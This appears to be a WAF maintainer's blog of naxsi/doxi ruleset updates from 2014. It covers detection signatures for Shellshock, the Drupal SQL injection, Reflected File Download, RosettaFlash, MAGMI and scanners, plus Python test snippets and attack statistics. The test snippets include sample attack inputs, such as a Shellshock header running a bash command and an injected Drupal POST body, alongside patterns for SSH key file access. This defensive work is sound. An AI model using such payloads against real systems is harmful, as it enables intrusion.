Friday, 31 October 2014

Ruleset-Update: Reflected File Download


Ruleset update with a test signature for Reflected File Download. Beware of false positives: this sig is largely untested and might break existing (legitimate) downloads.

For the vulnerability itself, please read the following articles by Oren Hafif:
- Blog: Reflected File Download - A New Web Attack Vector
- Paper: Reflected File Download a New Web Attack Vector


[+] new sigs:
  42000408 :: Drupal SQLI & RCE-Exploit Attempt #2 (rx)
  42000410 :: Windows-Exe/Command - File download (cmd, bat, exe,...)

#
# sid: 42000410
#
# matches a URL path ending in a Windows script extension, optionally
# followed by non-word characters; \w* replaces the original [\w*], which
# is a character class (one word char or a literal '*'), not a quantifier.
# note: .exe is not in the extension list although the msg names it.
#
MainRule "rx:\w*\.(bat|cmd|vbs|wsh|vbe|wsf|hta)\W*$" "msg:Reflected File Download / Windows-Command - File download (cmd, bat, exe,...)" "mz:URL" "s:$ATTACK:8" id:42000410  ;
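As an added example (not from the post or the doxi-rules repo), here is the sig evaluated in Python against constructed request URLs. naxsi compiles rx: patterns case-insensitively and applies mz:URL to the percent-decoded path only; the query string belongs to the ARGS zone, which is why an extension that appears only in a parameter is not caught. The URLs below are constructed, and the pattern is written with the `\w*` quantifier.

```python
import re
from urllib.parse import urlsplit, unquote

# Sig 42000410 as a Python regex. naxsi compiles rx: patterns
# case-insensitively and applies mz:URL to the decoded request path only;
# the query string belongs to the ARGS zone.
RFD_RX = re.compile(r"\w*\.(bat|cmd|vbs|wsh|vbe|wsf|hta)\W*$", re.IGNORECASE)


def url_zone(raw_url):
    """Return the percent-decoded path, i.e. what naxsi's URL zone sees."""
    return unquote(urlsplit(raw_url).path)


def rfd_hit(raw_url):
    return RFD_RX.search(url_zone(raw_url)) is not None


# Constructed URLs (not from the original post) mapped to the expected
# verdict. The first three have the Reflected File Download shape: the
# attacker appends a path segment so the browser names the download
# setup.bat while the JSONP endpoint still reflects the callback.
SAMPLES = {
    "/api/v1/;/setup.bat?callback=calc||": True,
    "/api/v1/search/setup.BAT/?q=x": True,        # case and trailing slash
    "/api/v1/%73etup.cmd?callback=foo": True,     # percent-encoded path
    "/api/v1/search?callback=setup.bat": False,   # extension only in ARGS
    "/downloads/installer.exe": False,            # .exe is not in the list
    "/docs/batch-processing/": False,             # no dot before 'bat'
}


def evaluate(samples=SAMPLES):
    return {url: rfd_hit(url) for url in samples}


if __name__ == "__main__":
    for url, hit in evaluate().items():
        print(f"{'BLOCK' if hit else 'pass '}  {url}")
```

The last two rows are the false-positive side of the coin: any site that serves `.cmd` or `.bat` files from a path will trip the sig, which is the caveat in the post.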


sigs are already pushed and available: https://bitbucket.org/lazy_dogtown/doxi-rules/src/


cheers,


mex

Sunday, 26 October 2014

Ruleset-Update: Magento/MAGMI-Rules + MongoDB - Bypass


The following sigs are against exploitation of MAGMI, a popular Magento plugin with severe security problems (or better: a backdoor with no security at all). Credit goes to bui from the naxsi team for pointing me to it and to @sonassi for finding and writing about the problems.

An additional signature covers a MongoDB auth bypass; please read the referenced blog post for more information.


The sigs were already pushed to the repo on Wednesday last week:
https://bitbucket.org/lazy_dogtown/doxi-rules/



[+] new sigs:
  42000400 :: app_server.rules     :: MongoDB Negated Parameter Server Side JavaScript Injection Attempt
  42000401 :: web_apps.rules       :: Magento - MAGMI-Access (possible Scan)
  42000403 :: web_apps.rules       :: Magento - MAGMI - Plugin-Upload
  42000404 :: web_apps.rules       :: Magento - MAGMI - magmi_*.php - Access
  42000405 :: web_apps.rules       :: Magento - MAGMI - clearcatalog.php
  42000406 :: web_apps.rules       :: Magento - MAGMI - ajax_readlocalxml.php
  42000407 :: web_apps.rules       :: Magento - MAGMI - Access


#
# sid: 42000400 | date: 2014-10-20 - 14:31
#
# # et-inspired
# http://blog.imperva.com/2014/10/nosql-ssji-authentication-bypass.html
# https://lists.emergingthreats.net/pipermail/emerging-sigs/2014-October/024974.html
#
MainRule "str:[$ne]" "msg:MongoDB Negated Parameter Server Side JavaScript Injection Attempt" "mz:BODY|ARGS" "s:$ATTACK:8" id:42000400  ;

#
# sid: 42000407 | date: 2014-10-26 - 12:36
#
# https://twitter.com/sonassi/status/523176348458967040
# http://www.exploit-db.com/exploits/35052/
#
MainRule "str:/magmi/" "msg:Magento - MAGMI - Access" "mz:URL" "s:$ATTACK:8" id:42000407  ;
    
      
#
# sid: 42000406 | date: 2014-10-26 - 12:36
#
# https://twitter.com/sonassi/status/523176348458967040
# http://www.exploit-db.com/exploits/35052/
#
MainRule "str:/web/ajax_readlocalxml.php" "msg:Magento - MAGMI - ajax_readlocalxml.php" "mz:URL" "s:$ATTACK:8" id:42000406  ;
    
      
#
# sid: 42000405 | date: 2014-10-26 - 12:36
#
# https://twitter.com/sonassi/status/523176348458967040
# http://www.exploit-db.com/exploits/35052/
#
MainRule "str:/web/clearcatalog.php" "msg:Magento - MAGMI - clearcatalog.php" "mz:URL" "s:$ATTACK:8" id:42000405  ;
    
      
#
# sid: 42000404 | date: 2014-10-26 - 12:36
#
# https://twitter.com/sonassi/status/523176348458967040
# http://www.exploit-db.com/exploits/35052/
#
MainRule "rx:/web/magmi_([a-z]*).php" "msg:Magento - MAGMI - magmi_*.php - Access" "mz:URL" "s:$ATTACK:8" id:42000404  ;
    
      
#
# sid: 42000403 | date: 2014-10-26 - 12:37
#
# https://twitter.com/sonassi/status/523176348458967040
# http://www.exploit-db.com/exploits/35052/
#
MainRule "str:/web/plugin_upload.php" "msg:Magento - MAGMI - Plugin-Upload " "mz:URL" "s:$ATTACK:8" id:42000403  ;
    
      
#
# sid: 42000401 | date: 2014-10-26 - 12:37
#
# https://twitter.com/sonassi/status/523176348458967040
# http://www.exploit-db.com/exploits/35052/
#
MainRule "str:/web/magmi.php" "msg:Magento - MAGMI-Access (possible Scan)" "mz:URL" "s:$ATTACK:8" id:42000401  ;



Friday, 17 October 2014

Ruleset-Update: Drupal SQLI & RCE-Exploit Attempt (CVE-2014-3704)

Please note: the sig targets the exploit/PoC and would not hold against fancier URL encoding such as "name%5b".

BUT: the attack WILL be blocked by naxsi anyway, by at least 3 rules from the core rule set, so my sig is for the attack, not the vuln. The Emerging Threats sigs cover all the possible encodings:

 Emerging Threat Signatures: http://pastebin.com/raw.php?i=NZnfzGCc
 POC: http://pastebin.com/F2Dk9LbX

 References:

  • https://www.drupal.org/SA-CORE-2014-005
  • http://www.reddit.com/r/netsec/comments/2jbu8g/sacore2014005_drupal_core_sql_injection/
  • http://pastebin.com/F2Dk9LbX

MainRule "str:name[0%20" "msg:Drupal SQLI & RCE-Exploit Attempt (CVE-2014-3704)" "mz:BODY" "s:$ATTACK:8" id:42000399  ;
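As an added example (not part of the post and not naxsi code), the encoding caveat above demonstrated in Python: a literal match on the raw body catches the PoC body, but the same payload with `[` encoded as `%5B`, or with `+` for space, slips past it. The second matcher percent-decodes each field name (twice, to cover double encoding) before looking for the exploit shape, an array key that starts with a digit followed by whitespace, which a legitimate Drupal login form never sends. The bodies are constructed; the regexes are mine, not the ET or doxi sigs.

```python
import re
from urllib.parse import unquote_plus

# Constructed POST bodies for the SA-CORE-2014-005 login-form shape (not
# captured traffic): the SQL payload sits in an array key of name[].
PLAIN   = "name[0%20;select%201]=a&name[0]=b&pass=x&form_id=user_login"
ENCODED = "name%5B0%20%3Bselect%201%5D=a&name%5B0%5D=b&pass=x&form_id=user_login"
PLUS    = "name%5b0+;select+1%5d=a&name[0]=b&pass=x&form_id=user_login"
BENIGN  = "name=alice&pass=x&form_id=user_login"

# What a str: sig does: a case-insensitive literal on the raw body.
LITERAL_RX = re.compile(re.escape("name[0%20"), re.IGNORECASE)

# Encoding-agnostic shape of the exploit: name[<digits><whitespace>...
DECODED_RX = re.compile(r"name\[\d+\s", re.IGNORECASE)


def literal_hit(body):
    return LITERAL_RX.search(body) is not None


def normalized_hit(body, max_rounds=2):
    """Decode each field name up to max_rounds times (catches %25-style
    double encoding and '+' as space), then match on the decoded form."""
    for field in body.split("&"):
        name = field.split("=", 1)[0]
        for _ in range(max_rounds):
            decoded = unquote_plus(name)
            if DECODED_RX.search(decoded):
                return True
            if decoded == name:      # nothing left to decode
                break
            name = decoded
    return False


def compare(bodies=(PLAIN, ENCODED, PLUS, BENIGN)):
    """(literal verdict, normalized verdict) per body."""
    return [(literal_hit(b), normalized_hit(b)) for b in bodies]


if __name__ == "__main__":
    for body, verdict in zip((PLAIN, ENCODED, PLUS, BENIGN), compare()):
        print(verdict, body[:40])
```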



The Rule has been pushed to Doxi-Rules at 2014-10-16 already: 
https://bitbucket.org/lazy_dogtown/doxi-rules

Wednesday, 24 September 2014

Ruleset-Update: Possible Remote code execution through Bash CVE-2014-6271 and some Scanner-Sigs

most important: ID 42000393 / Possible Remote code execution through Bash CVE-2014-6271 (see references below)

Updates are available through Doxi-Rules https://bitbucket.org/lazy_dogtown/doxi-rules/overview

German blog post with additional information on CVE-2014-6271 / Possible Remote code execution through Bash


[+] new sigs:
  42000386 :: web_server.rules     :: Nullbyte - Termination \0
  42000387 :: scanner.rules        :: Open Proxy-Autoconfig-Scan
  42000388 :: scanner.rules        :: Open Proxy-Autoconfig-Scan
  42000389 :: scanner.rules        :: Open Proxy-Autoconfig-Scan
  42000390 :: scanner.rules        :: UPNP-Scan
  42000391 :: web_server.rules     :: authorized_keys - Access
  42000392 :: web_server.rules     :: known_hosts Access
  42000393 :: web_server.rules     :: Possible Remote code execution through Bash CVE-2014-6271

#
# sid: 42000393 | date: 2014-09-25 - 00:37
#
# http://seclists.org/oss-sec/2014/q3/649
# https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/
# http://seclists.org/oss-sec/2014/q3/650
# http://www.reddit.com/r/netsec/comments/2hbxtc/cve20146271_remote_code_execution_through_bash/
#
MainRule "str:() {" "msg:Possible Remote code execution through Bash CVE-2014-6271" "mz:BODY|HEADERS" "s:$ATTACK:8" id:42000393  ;
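As an added example (not from the post), the sig applied to a constructed request the way mz:BODY|HEADERS sees it: every header value and the body are checked for the literal `() {`. Headers matter most here because a CGI web server copies them into HTTP_* environment variables, which is exactly where an unpatched bash looks for function definitions. The request is constructed, and the header parser is a deliberately minimal one.

```python
# Constructed request (not captured traffic) carrying the Shellshock
# function-definition prefix in two headers and in the body, plus one
# header that only looks similar.
RAW_REQUEST = (
    "POST /cgi-bin/status HTTP/1.1\r\n"
    "Host: example.test\r\n"
    "User-Agent: () { :; }; /bin/bash -c 'id'\r\n"
    "Cookie: session=abc\r\n"
    "Referer: () { :;}; echo x\r\n"
    "X-Test: (){ :;}; id\r\n"
    "Content-Length: 14\r\n"
    "\r\n"
    "() { :; }; id\n"
)

NEEDLE = "() {"  # the str: pattern of sig 42000393


def parse_request(raw):
    """Minimal HTTP/1.1 splitter: request line, header dict, body."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip()] = value.strip()
    return lines[0], headers, body


def shellshock_hits(raw):
    """Zones in which the sig fires: one entry per matching header plus
    'BODY', mirroring mz:BODY|HEADERS."""
    _, headers, body = parse_request(raw)
    hits = [f"HEADERS:{name}" for name, value in headers.items()
            if NEEDLE in value]
    if NEEDLE in body:
        hits.append("BODY")
    return hits


def bash_would_import(env_value):
    """Unpatched bash only imports an environment variable as a function
    when its value starts with exactly the four bytes '() {'. A value like
    '(){ :;}; id' is never imported, so the sig missing it is not a gap."""
    return env_value.startswith("() {")


if __name__ == "__main__":
    print(shellshock_hits(RAW_REQUEST))
```

The X-Test header shows the one place where the literal is tight on purpose: bash's import check compares the first four bytes of the value against `() {` with the space, so a variant without the space is neither imported nor matched.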


#
# sid: 42000391 | date: 2014-09-24 - 16:41
#
# ssh authorized_keys - access
#
MainRule "str:/authorized_keys" "msg:authorized_keys - Access" "mz:URL" "s:$UWA:8" id:42000391  ;


#
# sid: 42000386 | date: 2014-09-02 - 08:40
#
# http://security.stackexchange.com/questions/66414/getting-null-byte-injection-attacks-to-work-with-php-5-2-17
#
MainRule "str:\0" "msg:Nullbyte - Termination \0" "mz:BODY|URL|ARGS" "s:$ATTACK:8" id:42000386  ;

#
# sid: 42000390 | date: 2014-09-23 - 20:50
#
# https://community.rapid7.com/community/infosec/blog/2013/01/29/security-flaws-in-universal-plug-and-play-unplug-dont-play
#
MainRule "str:/gatedesc.xml" "msg:UPNP-Scan" "mz:URL" "s:$UWA:8" id:42000390  ;


#
# sid: 42000389 | date: 2014-09-23 - 20:49
#
# http://en.wikipedia.org/wiki/Proxy_auto-config
#
MainRule "str:wpad.dat" "msg:Open Proxy-Autoconfig-Scan" "mz:URL" "s:$UWA:8" id:42000389  ;


#
# sid: 42000388 | date: 2014-09-23 - 20:49
#
# http://en.wikipedia.org/wiki/Proxy_auto-config
# https://isc.sans.edu/forums/diary/Web+Scan+looking+for+infowhitelistpac/18675
#
MainRule "str:proxy.pac" "msg:Open Proxy-Autoconfig-Scan" "mz:URL" "s:$UWA:8" id:42000388  ;


#
# sid: 42000387 | date: 2014-09-23 - 20:49
#
# https://isc.sans.edu/forums/diary/Web+Scan+looking+for+infowhitelistpac/18675
#
MainRule "str:/whitelist.pac" "msg:Open Proxy-Autoconfig-Scan" "mz:URL" "s:$UWA:8" id:42000387  ;

Thursday, 17 July 2014

Ruleset-Update: RosettaFlash + some JAVA-Serialized-Object POST sigs

Most interesting is probably the RosettaFlash sig; @mikispag helped me get the regex right.

By the way, there is also a Rails update available addressing that issue (https://github.com/rails/rails/pull/16109), but there is no official note on the rails-security mailing list yet.


new signatures are available and pushed to the repo: https://bitbucket.org/lazy_dogtown/doxi-rules/src




[+] new sigs:
  42000385 :: app_server.rules     :: RosettaFlash JSONP-Exploit callback=CWS
  42000381 :: web_server.rules     :: Meterpreter-UA detected
  42000382 :: web_server.rules     :: local File access via file://
  42000383 :: app_server.rules     :: JAVA-Serialized-Object POST
  42000384 :: app_server.rules     :: JAVA-Serialized-Object POST / Class=*

--------------------------------------------------


#
# sid: 42000385 | date: 2014-07-17 - 09:45 
#
# http://miki.it/blog/2014/7/8/abusing-jsonp-with-rosetta-flash/
# http://miki.it/RosettaFlash/RosettaFlash.pdf
# http://quaxio.com/jsonp_handcrafted_flash_files/
# 
# credits to @mikispag for helping me get the regex right
#
MainRule "rx:^CWS\w{5}hC\w{50,}" "msg:RosettaFlash JSONP-Exploit callback=CWS" "mz:$ARGS_VAR:callback" "s:$ATTACK:8" id:42000385  ;
      
#
# sid: 42000382 | date: 2014-05-21 - 23:38 
#
# http://vsecurity.com/download/papers/XMLDTDEntityAttacks.pdf
#
MainRule "str:file://" "msg:local File access via file://" "mz:BODY|ARGS" "s:$UWA:8" id:42000382  ;
      
#
# sid: 42000384 | date: 2014-06-22 - 14:57 
#
# http://www.exploit-db.com/exploits/28713/
#
MainRule "str:class=" "msg:JAVA-Serialized-Object POST / Class=*" "mz:$HEADERS_VAR:Content-Type" "s:$ATTACK:8" id:42000384  ;
      
       
#
# sid: 42000383 | date: 2014-06-22 - 14:57 
#
# http://www.exploit-db.com/exploits/28713/
#
MainRule "str:java-serialized-object" "msg:JAVA-Serialized-Object POST" "mz:$HEADERS_VAR:Content-Type" "s:$ATTACK:8" id:42000383  ;


------------------------------------------------

# the following is a snort-sig for rosetta-flash,
# totally untested, for your leisure
# (note: the sid below exceeds Snort's 32-bit sid range and must be
#  changed to a valid value before the rule will load)

alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS \
(msg:"RosettaFlash Exploit-Attempt"; flow:established,to_server; \
uricontent:"?callback=CWS"; nocase; uricontent:"hC"; within:9; \
pcre:"/callback=CWS\w{5}hC\w{50,}/i"; \
reference:url,miki.it/blog/2014/7/8/abusing-jsonp-with-rosetta-flash/; \
reference:url,miki.it/RosettaFlash/RosettaFlash.pdf; \
reference:url,quaxio.com/jsonp_handcrafted_flash_files/; \
classtype:web-application-attack; sid:42010101023; rev:2;)
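As an added example that serves both the doxi sig 42000385 above and the Snort rule's pcre (it is not code from the post, the doxi repo or the Rosetta Flash project), the shared pattern is evaluated against constructed callback values, and a small RFC 1950 check shows why the `hC` anchor is sound: 0x68 0x43 is a valid zlib header (compression method 8, CMF*256+FLG divisible by 31), which is what lets a compressed SWF start with printable bytes that survive as a JSONP callback name. The callback strings are constructed, not real Rosetta Flash output.

```python
import re

# The pattern shared by doxi sig 42000385 (on the callback argument) and
# the Snort rule's pcre; naxsi rx: matching is case-insensitive.
ROSETTA_RX = re.compile(r"^CWS\w{5}hC\w{50,}", re.IGNORECASE)


def is_ascii_zlib_header(two_bytes):
    """RFC 1950 header check: compression method must be 8 (deflate) and
    CMF*256+FLG must be a multiple of 31. 'hC' (0x68 0x43) passes, which is
    why the compressed SWF can start with printable bytes."""
    cmf, flg = two_bytes[0], two_bytes[1]
    return (cmf & 0x0F) == 8 and ((cmf << 8) | flg) % 31 == 0


def rosetta_hit(callback_value):
    return ROSETTA_RX.match(callback_value) is not None


# Constructed callback values (not real Rosetta Flash output) mapped to
# whether the sig should fire: compressed-SWF magic, 5 header bytes, the
# ASCII zlib header, then at least 50 alphanumeric deflate bytes.
SAMPLES = {
    "CWSMIKI0hC" + "D0Up0IZUnU" * 6: True,
    "cwsmiki0hc" + "d0up0izunu" * 6: True,   # case-insensitive like naxsi
    "jQuery19102345_1405000000000": False,   # ordinary JSONP callback
    "CWS12345hCabc": False,                  # too short for a real SWF body
    "FWS" + "A" * 70: False,                 # uncompressed SWF is not covered
}


def evaluate(samples=SAMPLES):
    return {value: rosetta_hit(value) for value in samples}


if __name__ == "__main__":
    print(is_ascii_zlib_header(b"hC"), evaluate())
```

The `FWS` row is the limit of the sig: it keys on the compressed-SWF magic, so the regex says nothing about an uncompressed SWF that happens to be alphanumeric; the `hC` requirement is what makes the pattern specific to this technique.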






Thursday, 8 May 2014

Ruleset-Update: Tomcat-Manager - Sigs & misc Scanner-Rules






Rules-Repo:
  • https://bitbucket.org/lazy_dogtown/doxi-rules/src 

Updates:

  • Struts-0day-Sigs (already pushed 3 weeks ago)
  • Tomcat-Manager-Sigs to detect access to certain Manager-Command-Calls from the outside
  • misc scanner sigs


[+] new sigs:
  42000361 :: scanner.rules        :: JAVA-UA, possible Scanner
  42000362 :: scanner.rules        :: Bash-Profile et al Scan
  42000363 :: scanner.rules        :: ScanAlert Vulnerability Scanner
  42000364 :: scanner.rules        :: Sucuri Vulnerability Scanner
  42000365 :: scanner.rules        :: SiteLock Vulnerability Scanner
  42000366 :: scanner.rules        :: OpenVAS - Scanner
  42000367 :: app_server.rules     :: Java-Classloader-Call
  42000368 :: web_server.rules     :: Facebook External Hit
  42000369 :: app_server.rules     :: Tomcat-Manager/deploy-command
  42000370 :: app_server.rules     :: Tomcat-Manager/list-command
  42000371 :: app_server.rules     :: Tomcat-Manager/reload-command
  42000372 :: app_server.rules     :: Tomcat-Manager/serverinfo-command
  42000373 :: app_server.rules     :: Tomcat-Manager/resources-command
  42000374 :: app_server.rules     :: Tomcat-Manager/sessions-command
  42000375 :: app_server.rules     :: Tomcat-Manager/start-command
  42000376 :: app_server.rules     :: Tomcat-Manager/stop-command
  42000377 :: app_server.rules     :: Tomcat-Manager/undeploy-command
  42000378 :: app_server.rules     :: Tomcat-Manager/findleaks-command
  42000379 :: app_server.rules     :: Tomcat-Manager/serverstatus-command
  42000380 :: app_server.rules     :: Tomcat-Manager/jmxproxy-access



#
# sid: 42000380 | date: 2014-05-02 - 20:23 
#
# http://tomcat.apache.org/tomcat-7.0-doc/manager-howto.html#Supported_Manager_Commands
#
MainRule "str:/manager/jmxproxy/" "msg:Tomcat-Manager/jmxproxy-access" "mz:URL" "s:$UWA:8" id:42000380  ;
      
       
#
# sid: 42000379 | date: 2014-05-02 - 17:48 
#
# http://tomcat.apache.org/tomcat-7.0-doc/manager-howto.html#Supported_Manager_Commands
#
MainRule "str:/manager/text/serverstatus" "msg:Tomcat-Manager/serverstatus-command" "mz:URL" "s:$UWA:8" id:42000379  ;
      
       
#
# sid: 42000378 | date: 2014-05-02 - 17:47 
#
# http://tomcat.apache.org/tomcat-7.0-doc/manager-howto.html#Supported_Manager_Commands
#
MainRule "str:/manager/text/findleaks" "msg:Tomcat-Manager/findleaks-command" "mz:URL" "s:$UWA:8" id:42000378  ;
      
       
#
# sid: 42000377 | date: 2014-05-02 - 17:46 
#
# http://tomcat.apache.org/tomcat-7.0-doc/manager-howto.html#Supported_Manager_Commands
#
MainRule "str:/manager/text/undeploy" "msg:Tomcat-Manager/undeploy-command" "mz:URL" "s:$UWA:8" id:42000377  ;
      
       
#
# sid: 42000376 | date: 2014-05-02 - 17:46 
#
# http://tomcat.apache.org/tomcat-7.0-doc/manager-howto.html#Supported_Manager_Commands
#
MainRule "str:/manager/text/stop" "msg:Tomcat-Manager/stop-command" "mz:URL" "s:$UWA:8" id:42000376  ;
      
       
#
# sid: 42000375 | date: 2014-05-02 - 17:45 
#
# http://tomcat.apache.org/tomcat-7.0-doc/manager-howto.html#Supported_Manager_Commands
#
MainRule "str:/manager/text/start" "msg:Tomcat-Manager/start-command" "mz:URL" "s:$UWA:8" id:42000375  ;
      
       
#
# sid: 42000374 | date: 2014-05-02 - 17:45 
#
# http://tomcat.apache.org/tomcat-7.0-doc/manager-howto.html#Supported_Manager_Commands
#
MainRule "str:/manager/text/sessions" "msg:Tomcat-Manager/sessions-command" "mz:URL" "s:$UWA:8" id:42000374  ;
      
       
#
# sid: 42000373 | date: 2014-05-02 - 17:44 
#
# http://tomcat.apache.org/tomcat-7.0-doc/manager-howto.html#Supported_Manager_Commands
#
MainRule "str:/manager/text/resources" "msg:Tomcat-Manager/resources-command" "mz:URL" "s:$UWA:8" id:42000373  ;
      
       
#
# sid: 42000372 | date: 2014-05-02 - 17:44 
#
# http://tomcat.apache.org/tomcat-7.0-doc/manager-howto.html#Supported_Manager_Commands
#
MainRule "str:/manager/text/serverinfo" "msg:Tomcat-Manager/serverinfo-command" "mz:URL" "s:$UWA:8" id:42000372  ;
      
       
#
# sid: 42000371 | date: 2014-05-02 - 17:43 
#
# http://tomcat.apache.org/tomcat-7.0-doc/manager-howto.html#Supported_Manager_Commands
#
MainRule "str:/manager/text/reload" "msg:Tomcat-Manager/reload-command" "mz:URL" "s:$UWA:8" id:42000371  ;
      
       
#
# sid: 42000370 | date: 2014-05-02 - 17:43 
#
# http://tomcat.apache.org/tomcat-7.0-doc/manager-howto.html#Supported_Manager_Commands
#
MainRule "str:/manager/text/list" "msg:Tomcat-Manager/list-command" "mz:URL" "s:$UWA:8" id:42000370  ;
      
       
#
# sid: 42000369 | date: 2014-05-02 - 17:42 
#
# http://tomcat.apache.org/tomcat-7.0-doc/manager-howto.html#Supported_Manager_Commands
#
MainRule "str:/manager/text/deploy" "msg:Tomcat-Manager/deploy-command" "mz:URL" "s:$UWA:8" id:42000369  ;

#
# sid: 42000368 | date: 2014-04-27 - 08:03 
#
# http://chr13.com/2014/04/20/using-facebook-notes-to-ddos-any-website/
# https://www.mare-system.de/news/mare/1398410520/
#
MainRule "str:facebookexternalhit" "msg:Facebook External Hit" "mz:$HEADERS_VAR:User-Agent" "s:$UWA:7" id:42000368  ;

       
#
# sid: 42000367 | date: 2014-04-24 - 21:15 
#
# http://struts.apache.org/release/2.3.x/docs/s2-020.html
# http://www.pwntester.com/blog/2014/04/24/struts2-0day-in-the-wild/
#
MainRule "str:classloader" "msg:Java-Classloader-Call" "mz:BODY|ARGS" "s:$UWA:8" id:42000367  ;


#
# sid: 42000366 | date: 2014-04-24 - 09:57 
#
# 
#
MainRule "str:openvas" "msg:OpenVAS - Scanner" "mz:$HEADERS_VAR:User-Agent" "s:$UWA:8" id:42000366  ;
      
       
#
# sid: 42000365 | date: 2014-04-24 - 09:54 
#
# 
#
MainRule "str:sitelock" "msg:SiteLock Vulnerability Scanner" "mz:$HEADERS_VAR:User-Agent" "s:$UWA:8" id:42000365  ;
      
       
#
# sid: 42000364 | date: 2014-04-24 - 09:54 
#
# 
#
MainRule "str:sucuri" "msg:Sucuri Vulnerability Scanner" "mz:$HEADERS_VAR:User-Agent" "s:$UWA:8" id:42000364  ;
      
       
#
# sid: 42000363 | date: 2014-04-24 - 09:52 
#
# http://www.botopedia.org/index.php?option=com_k2&view=item&id=350:scanalert-bot
#
MainRule "str:scanalert" "msg:ScanAlert Vulnerability Scanner" "mz:$HEADERS_VAR:User-Agent" "s:$UWA:8" id:42000363  ;
      
       
#
# sid: 42000362 | date: 2014-04-24 - 09:46 
#
# 
#
MainRule "str:.bash" "msg:Bash-Profile et al Scan" "mz:URL" "s:$UWA:8" id:42000362  ;
      
       
#
# sid: 42000361 | date: 2014-04-19 - 17:19 
#
# 
#
MainRule "str:java/" "msg:JAVA-UA, possible Scanner" "mz:$HEADERS_VAR:User-Agent" "s:$UWA:8" id:42000361  ;
      



Monday, 14 April 2014

Ruleset-Update: Contao & Typo3-Signatures


- some sigs based on a recent Contao vuln: https://github.com/contao/core/issues/6855
- some generic sigs to detect config option injection in Contao and TYPO3



[+] new sigs:
  42000356 :: web_apps.rules       :: Contao VAR TL_* - Injection
  42000357 :: web_apps.rules       :: Contao-InstallTool-Access
  42000358 :: web_apps.rules       :: Typo3-Backend-Access
  42000359 :: web_apps.rules       :: TYPO3_CONF_* Value - Injection
  42000360 :: web_apps.rules       :: Contao-Install install.php - Access

#
# sid: 42000360 | date: 2014-04-14 - 21:23
#
# https://github.com/contao/core/issues/6855#issuecomment-39571171
#
MainRule "str:/contao/install.php" "msg:Contao-Install install.php - Access" "mz:URL" "s:$UWA:8" id:42000360  ;
     
       
#
# sid: 42000359 | date: 2014-04-14 - 21:20
#
#
#
MainRule "str:typo3_conf" "msg:TYPO3_CONF_* Value - Injection" "mz:ARGS" "s:$UWA:8" id:42000359  ;
     
       
#
# sid: 42000358 | date: 2014-04-14 - 21:15
#
#
#
MainRule "str:/typo3/" "msg:Typo3-Backend-Access" "mz:URL" "s:$UWA:8" id:42000358  ;
     
       
#
# sid: 42000357 | date: 2014-04-14 - 21:14
#
# https://github.com/contao/check
#
MainRule "str:installer" "msg:Contao-InstallTool-Access" "mz:$ARGS_VAR:c" "s:$UWA:8" id:42000357  ;
     
       
#
# sid: 42000356 | date: 2014-04-14 - 20:43
#
# https://github.com/contao/core/issues/6855
# https://github.com/contao/core/pull/6863/files
#
MainRule "str:tl_" "msg:Contao VAR TL_* - Injection" "mz:ARGS" "s:$UWA:8" id:42000356  ;


Naxsi - Stats

- text-only version: https://gist.github.com/anonymous/10679230

# 30-days - Naxsi-Stats (3 sensors, 10 domains)
# 2014-04-14

count | id       |  message
------+-----------+-----------------------------
1880   1000       sql keywords
1721   1200       double dot
1646   1202       obvious probe
1420   10         naxsi internal: uncommon hex encoding
1332   1310       [, possible js
1332   1311       ], possible js
1229   42000030   DN WEB_SERVER /proc/self - Access in URI
1028   42000316   DN SCAN WinHttpRequest - UA
1000   1100       http:// scheme
773    1001       double quote
746    1002       0x, possible hex encoding
741    1007       mysql comment (--)
739    1013       simple quote
655    1205       backslash
598    1016       mysql comment (#)
582    42000244   DN SCAN PHPMyAdmin - Scanner (2)
431    1303       html close tag
420    42000170   DN SCAN Scanner sqlmap
404    42000062   DN WEB_SERVER Generic JOOMLA-Exploit-Attempt (option=com_)
394    42000309   DN SCAN Misformed Proxy-Scan
379    1302       html open tag
291    42000261   DN WEB_SERVER possible WP-Scan (wp-login)
179    1009       equal in var, probable sql/xss
153    1314       grave accent !
148    42000313   DN SCAN Joomlas Administrator-Login-Attempt
131    42000317   DN SCAN Wordpress-UA, probably Botnet-Attack
112    12         naxsi internal: uncommon URL
97     42000262   DN WEB_SERVER possible WP-Scan (wp-admin)
94     11         naxsi internal: uncommon content-type
76     42000310   DN SCAN Abnormal double http:// in HTTP header,
71     42000243   DN SCAN PHPMyAdmin - Scanner
64     1006       mysql keyword (&&)
60     42000047   DN WEB_SERVER PHPMyAdmin - Scripts/Setup-Request
60     42000071   DN WEB_APPS PHPMYADMIN setup.php - Access
56     1312       ~ character
44     42000311   DN SCAN poss. malicious Scanner using Fake UA Apache/Synapse
31     42000254   DN WEB_SERVER possible INI - File - Access
30     42000227   DN SCAN Scanner ZmEu exploit scanner
30     42000285   DN WEB_SERVER Joomla JCE-Exploit-Scan
28     1402       Content is neither mulipart/x-www-form..
26     1003       mysql comment (/*)
26     42000305   DN SCAN Possible HNAP-Exploit-Attempt
25     2          naxsi internal: big request
22     42000021   DN WEB_SERVER Tilde in URI, potential .php source disclosure vulnerability
22     42000271   DN WEB_SERVER ForumSpammer Access
22     42000319   DN SCAN Possible WHMCS - Scan
21     42000181   DN SCAN Scanner webster pro
20     42000128   DN SCAN Nessus-Scanner detected
19     1315       double encoding !
19     42000048   DN WEB_SERVER PHPINFO - in URL
18     1103       php:// scheme
17     14         naxsi internal: uncommon post boundary
13     42000203   DN SCAN Scanner Paros Proxy Scanner
13     42000321   DN SCAN probably Malicous UA
12     42000077   DN WEB_SERVER LIBWWW_perl-UA detected
12     42000307   DN SCAN WP-Contents/Plugins Access
8      42000082   DN WEB_SERVER Tomcat - Manager - Access
8      42000253   DN WEB_SERVER possible INC - File - Access
7      42000046   DN SCAN DFind w00tw00t GET-Requests
7      42000052   DN WEB_SERVER SVN_Repo-Access
7      42000070   DN WEB_SERVER possible sql-injection (CAST())
7      42000236   DN WEB_SERVER DoubleDot in URL
7      42000263   DN WEB_SERVER .htaccess - Access
6      1004       mysql comment (*/)
5      1010       parenthesis, probable sql/xss
5      42000002   DN APP_SERVER PHP-file-access
5      42000076   DN SCAN VTI_BIN - Access
4      42000054   DN WEB_SERVER HEX_string found
4      42000068   DN WEB_SERVER JAR - Download Request
4      42000156   DN SCAN Scanner safexplorer
3      42000003   DN APP_SERVER ASP_file access
